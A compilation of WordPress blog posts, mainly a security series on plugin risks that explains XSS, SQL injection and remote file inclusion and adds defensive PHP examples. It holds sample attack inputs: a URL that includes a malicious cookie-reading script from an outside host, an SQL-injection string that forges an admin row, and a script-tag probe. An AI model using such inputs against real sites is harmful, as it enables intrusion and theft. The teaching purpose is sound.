About the target of the links

Do not open new windows in your links – Let the user have control. If you think that opening another window prevents the user from leaving your page, you are wrong. Do not fill the user's computer with trash. If they want to return to your blog, they will return. The back button is the most used button on the internet.

The last sentence, personally, opened my mind, and it is a universal truth. It may give some sense of abandonment if they click on a link and we open it in the same window instead of opening it in another. I always used the latter, but as Adseok says: If they want to go back to your blog, they will come back.

WordPress Tweaks – Tweak your blog

WordPress Tweaks is a curious and great plugin for WordPress that has just been published. Its function is to let you customize your blog to the maximum without touching a line of code.

A champion of customization that, I suppose, will expand its "tweaks", so we will have to keep track of it.

WordPress plugin security: less is more

Continuing with the series on plugin security in WordPress, the road map of these articles is growing a bit more. Fortunately, it is adapting to all kinds of users. At the risk of being repetitive, this series is designed for the non-developer, the average user. Security is a mystified area that requires some demystification.

Very few people know how to configure WordPress when they first start blogging. Many have never blogged before and are fond of the code. Others come to WordPress from other systems because they have heard about the broad support, the easy-to-use interface and, yes, the plethora of available plugins. It sounds like a fantastic pot of gold at the end of the rainbow, right? Especially for people who emerge from the "plugin hell" of the Movable Type platform.

Normally, the first thing they ask me as a WordPress "expert" is "Where do I get good plugins from?" I answer "To do what?" 🙂 (and I'm being honest). There are a couple of things you should know about plugins. The first is that plugins should be used to meet needs, and the second is that plugins should be used sparingly.

Plugins should be used to meet needs
The easiest thing for a WordPress user is to look like crazy for plugins to install. It reminds me of high school girls who customize backpacks and folders. People do the same with their blogs. The first thing they do is start to customize it and add functions.

Stop!

Plugins must be used to cover needs. Do you need to have that gizmo or that doohickey? Maybe yes and maybe not. Let's see: every time a plugin is activated, another attack vector is created. That does not mean that an attack will succeed. It only means that an attacker has one more door to try. If you do not need that plugin, do not activate it. Similarly, if you stop using that plugin, disable it.

Plugins should be used sparingly
Along the same lines, plugins should be used as little as possible. Depending on my needs, it is not uncommon for me to set up a blog with only 3 or 4 plugins. The more plugins you use, the more avenues of attack, correct? (Additionally, if the plugin lets you put things in your template, you could be disrupting your blog a bit more, but that's a different matter, an aesthetic issue.)

Read other articles from the series on Security in WordPress plugins:

  1. The golden rule
  2. What is dangerous?
  3. Dangerous combinations
  4. Less is more

NOTICE: this publication is from two or more years ago. If it's code or a plugin, it might not work in the latest versions of WordPress, and if it's a news story, it might be obsolete. So do not say we have not warned you.


Vote for WordPress!

Webware opened the voting for the annual Webware Awards.

This award is decided by votes from users around the world, who choose their favorite 2.0 applications among all those available. There are several categories, and WordPress is nominated in the category "publications and photography" along with other big companies.

WordPress was the winner in 2007; could it be this year? If you think that WP deserves it (as we do), vote for it at this link.

This is original content from WordPress Help – Resources, themes, plugins and tutorials in Spanish, first published by Guillermo Mayoraz here: Vote for WordPress!

How to integrate WordPress and phpBB forums • WordPress Help

If I had known this before, I would have been tempted, but now I am happy with the forum on SMF. Anyway, it is good to note that there is a WordPress plugin that greatly facilitates the integration between a phpBB forum system and your blog.

The plugin in question is called WP-United, and it not only integrates the users of the blog and the forum but also offers widgets to show the latest forum posts, forum statistics and much more on the blog.

You can see a demo on this link or directly download the plugin here.

Between Blogs grows and seduces • WordPress Help

A new blogger has just joined the network Entre Blogs. True Seduction joins Between Blogs, with which we now offer 12 visions of the blogosphere, with original quality content and veteran bloggers who offer us their particular vision of what they know best and share.

In True Seduction you can find courses and seminars on seduction and personal development, couples' relationships and self-help. A very interesting blog if you are looking for help to gain confidence.

Dangerous Combinations • WordPress Help

I have been struggling with this question since the last entry in the series about plugin security in WordPress. As I am aware that this series will be used as a resource by the huge WordPress community, I think it is necessary to make these articles abstract enough that non-technical users can understand them, without isolating some readers from the rest and leaving them orphaned.

What is a dangerous combination?

Plugins depend on user permissions

Plugins that give registered users the ability to do something should be scrutinized. With the arrival of the WordPress 2.x series, many plugins that worked on the basis of the 1.5.x series no longer work as expected. This is because WordPress 1.5 used User Levels, a range of numbers from 0 to 10 that offered individuals various levels of access. In WordPress 2.x, user levels gave way to Roles and Capabilities, which offer individuals roles such as Administrator, Editor, Author, Contributor or Subscriber.

Plugins that rely on user permissions can improperly offer access to features that should be left to an administrator. For example, a plugin can place a submenu in the admin panel on the Manage page or the Options page that could allow access to other features of those areas. By default, WordPress restricts access to these pages to users with privileges. A poorly written plugin could undo that restriction.
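The submenu case described above, written as a small plugin file. This is an added example, not code from the article or from any plugin it names; every name prefixed demo_ is hypothetical, and it assumes the file is loaded as a plugin by a current WordPress install (where the Options menu is labelled Settings).

```php
<?php
/*
Plugin Name: Demo Settings (added example)
*/

// Weak form of the registration (kept as a comment so it never runs):
//     add_options_page('Demo', 'Demo', 'read', 'demo-settings', 'demo_render');
// 'read' is held by every role down to Subscriber, so any registered user
// would get this page under the Options/Settings menu.

add_action('admin_menu', 'demo_register_menu');
function demo_register_menu() {
    // A capability, not a numeric user level: by default only Administrators hold it.
    add_options_page('Demo', 'Demo', 'manage_options', 'demo-settings', 'demo_render');
}

function demo_render() {
    // Re-check inside the callback; hiding the menu entry is not access control.
    if (!current_user_can('manage_options')) {
        wp_die('You are not allowed to change these settings.');
    }
    $value = get_option('demo_greeting', '');
    echo '<div class="wrap"><form method="post" action="' . esc_url(admin_url('admin-post.php')) . '">';
    echo '<input type="hidden" name="action" value="demo_save">';
    wp_nonce_field('demo_save'); // ties the submission to this form and this user
    echo '<input type="text" name="demo_greeting" value="' . esc_attr($value) . '">';
    submit_button();
    echo '</form></div>';
}

add_action('admin_post_demo_save', 'demo_save');
function demo_save() {
    // The save handler is a separate entry point and needs its own checks.
    if (!current_user_can('manage_options')) {
        wp_die('You are not allowed to change these settings.');
    }
    check_admin_referer('demo_save'); // stops here if the nonce is missing or wrong
    $greeting = sanitize_text_field(wp_unslash($_POST['demo_greeting'] ?? ''));
    update_option('demo_greeting', $greeting);
    wp_safe_redirect(admin_url('options-general.php?page=demo-settings'));
    exit;
}
```

The checks are only as tight as the role assignments: if a role-editing plugin grants manage_options to a custom role, that role passes every check above.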

Careless use of Role Manager

Owen Winkler wrote a very popular plugin called Role Manager which, as powerful and useful as it is (and I use it on several blogs), increases the opportunity to open a back door to a user with bad intentions. I love this plugin since it lets me customize user access to WordPress functionality. It even allows me to create new user roles, such as "Designer", which could give my designer access to the Presentation menu without having to give complete administration privileges.

However, if I am not cautious, I could customize permissions in such a way as to allow inappropriate access to areas of my blog. You may think that only a careless blogger would allow everyone access to a blog. Some blogs legitimately restrict comments, at the very least, to registered users, and registered users have limited access to the administration panel (mostly to change passwords and other user profile options). Using the Role Manager plugin in combination with the previous element, plugins that depend on permissions, could open your blog to a world of horror.

These are some dangerous combinations. There are more, and I could even be more specific. Maybe in a later article.

Read other articles in the series about Security in WordPress plugins :

  1. The golden rule
  2. What is dangerous?
  3. Dangerous combinations
  4. Less is more

All in one SEO pack guide

All in one SEO pack is a marvel in plugin form that was designed to make life easier for any blogger who wants to improve their positioning in search engines.

"All in one" comes from the spirit of simplifying the blog's SEO in one piece, which covers and handles the following factors to improve the ranking of our weblog:

It takes care of that, and does it very well.

As it is a .ZIP file, we must unzip it.

Then we browse the unzipped directory; we must upload the folder that contains the files.

And copy that directory to wp-content/plugins on our server.

If the transfer was successful, we only need to enter our WordPress panel (as administrator).

Ready: we click on activate and we have AIOSP ready to be configured.

WordPress Plugins Security: What is dangerous?

This week I started the series on WordPress plugin security. We have established that the golden rule in web security is to watch the "gateways", that is, to monitor the areas of a website that an attacker could use to send data to your website. I would like to delve deeper into this today.

WordPress support expert Podz asks in his blog, "What is dangerous?"

The answer lies in understanding the attack vectors. Attack vectors such as Cross-Site Scripting, SQL Injection and Remote File Inclusion are some of the most used methods to attack a website. If you understand the principles on which they are based, you will have a greater understanding of what you need to look for in a plugin. So let's get to it, shall we?

Cross-Site Scripting (XSS)

Cross-site scripting has been described by Network World as the "greatest security threat". Cross-site scripting is a general term that refers to the injection of JavaScript into a page. And since JavaScript allows the browser to do a wide variety of things, including potentially executing code on the file system, giving an attacker a vector to get that code onto your computer or website is dangerous. An example of XSS would be the flaw in Democracy 1.2. A common entry point for XSS is an HTML form (contact form, tagboard, etc.) or the address bar.

SQL injection

From a programming point of view, SQL injection occurs when input from the browser (whether from a form, the address bar or anywhere else) is not properly filtered to make it "safe" and is then fed directly to a database. This attack vector would allow the content of a database-backed website to be altered or even deleted. It could also be used in combination with XSS to inject malicious JavaScript or server-side scripts into the content of a page.
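The two sections above (script injected through a form, and form input fed straight to a database) meet in a tagboard, so the following added example covers both. It is not code from the article: the table, function names and inputs are constructed for illustration, and it assumes PHP with the pdo_sqlite extension so that it runs offline.

```php
<?php
// Added example: a minimal tagboard on in-memory SQLite (constructed schema).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE tagboard (author TEXT, message TEXT)');

// Unsafe: form input is pasted into the statement, so a quote in the
// input ends the string literal and the rest is parsed as SQL.
function save_unsafe(PDO $db, string $author, string $message): void
{
    $db->exec("INSERT INTO tagboard (author, message) VALUES ('$author', '$message')");
}

// Safe: placeholders send the input separately from the statement text.
function save_safe(PDO $db, string $author, string $message): void
{
    $stmt = $db->prepare('INSERT INTO tagboard (author, message) VALUES (?, ?)');
    $stmt->execute([$author, $message]);
}

// Output side: escape on the way into HTML so stored markup is shown, not run.
function render(PDO $db): string
{
    $html = '';
    foreach ($db->query('SELECT author, message FROM tagboard') as $row) {
        $html .= sprintf(
            "<li><b>%s</b>: %s</li>\n",
            htmlspecialchars($row['author'], ENT_QUOTES, 'UTF-8'),
            htmlspecialchars($row['message'], ENT_QUOTES, 'UTF-8')
        );
    }
    return $html;
}

// Constructed inputs: one alters the statement, one carries script markup.
$forged = "hello'), ('admin', 'forged entry";
$markup = '<script>alert(1)</script>';

save_unsafe($db, 'visitor', $forged); // stores two rows, one of them signed "admin"
save_safe($db, 'visitor', $forged);   // stores one row holding the literal text
save_safe($db, 'visitor', $markup);   // stored as typed, neutralised in render()

echo render($db);
```

Inside a WordPress plugin the same two jobs are done by $wpdb->prepare() for the query and esc_html() for the output.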

Remote File Inclusion

A third attack vector that should be avoided is remote file inclusion. This means using a PHP function (include()) to insert a piece of code hosted on any site and execute it on the remote server. In other words, an attacker can write a small script that records IP addresses, cookies, etc., and if they can include that PHP script on your site, it can provide valuable information to the attacker. RFI is usually found when user input (form, address bar) is passed directly into an include().

For example, a link of this type: http://example.com/?page=about could have some code behind it that provides the right content. This kind of sloppy code is more common than you imagine. The developer's intention could be, in this example, to include the contents of about.php on the main page. But what would happen if I sent this request from my browser:
http://example.com/?page=http://mydomain.com/script_lectura_cookie_maliciosa
Then your page would actually be executing this instruction:

A very dangerous issue.
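The ?page= dispatcher from this section, with the request value reduced to a lookup key. This is an added example, not code from the article: the include line shown in the comment is an assumed form of the sloppy code it describes, and the page map and function name are hypothetical.

```php
<?php
// Added example. Assumed form of the vulnerable dispatcher (comment only):
//     include($_GET['page'] . '.php');
// When PHP's allow_url_include setting is On, a URL in ?page= is fetched
// and executed as PHP on your server. Keeping "allow_url_include = Off"
// in php.ini removes the remote case; the lookup below removes the
// user-controlled path altogether.

/**
 * Map a requested page name to a file chosen by the site owner.
 * The request value is only ever used as an array key, never as a path.
 */
function resolve_page(string $requested, array $allowed, string $default = 'home'): string
{
    // Exact key match: URLs, "../" traversal and empty values do not match.
    if (array_key_exists($requested, $allowed)) {
        return $allowed[$requested];
    }
    return $allowed[$default];
}

// Hypothetical page map for this example.
$pages = [
    'home'  => __DIR__ . '/pages/home.php',
    'about' => __DIR__ . '/pages/about.php',
];

// Constructed sample requests, including the URL quoted in the article.
$samples = [
    'about',
    'http://mydomain.com/script_lectura_cookie_maliciosa',
    '../../wp-config',
    '',
];
foreach ($samples as $value) {
    printf("%-55s -> %s\n", var_export($value, true), resolve_page($value, $pages));
}

// In the real page the result is what gets included:
//     include resolve_page($_GET['page'] ?? 'home', $pages);
```

Only the first sample resolves to about.php; the other three fall back to the home page.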

How does this affect WordPress?

In the following articles of this series we will take a look at the security implications specific to WordPress plugins. Any plugin that is used should be inspected initially to see if it allows interaction with the user. If it allows user interaction, it might be prone to one of these attack vectors.

Do not assume, however, that a plugin that accepts interaction is dangerous. It is up to the code and the developer to handle user input appropriately and securely.

Read other articles in the series about WordPress plugins security:

  1. The golden rule
  2. What is dangerous?
  3. Dangerous combinations
  4. Less is more


4 tips (more) to avoid being hacked

A tip for staying safe never hurts, especially when, although quite logical, it reminds us that we sometimes rest on our laurels when everything works well…

WPThemesPlugin published some very useful tips to avoid being hacked; to all those we have been publishing to date, we add these four:

Have the latest version of the software.

This should apply to both WordPress and plugins.

Luckily, the plugins panel now warns us when we have an outdated one:

… and offers us the link to download it.

Disable and remove what we do not use.

It would be unfortunate for a blog to be hacked through a plugin that is not even used, but it happens.

The rule assumes that the more software we have installed, the more likely we are to be vulnerable to an attack.

So the best thing we can do in this case is to uninstall any plugin that we do not use and, while we are at it, take the opportunity to clean up the blog by removing those themes that we once uploaded "to try" and, finally, deleting those posts that stayed drafts forever, lest something like the known vulnerability in 2.3.2 happen again…

Only download and use trusted code.

Download WordPress from the official site, and plugins from the site of its creators.

Why should I pay attention to this guy?

Because, being open source, anyone with programming skills can insert their own code and redistribute it, and after that, most unsuspecting mortals who do not follow this advice may use a plugin, or the CMS itself, without realizing that it has a Trojan-sized backdoor.

Be careful when including JavaScript!

JavaScript code can do a lot of things on a site, even install malware.

You should only include JavaScript written by trusted entities, such as Google Adsense (if you trust them…).
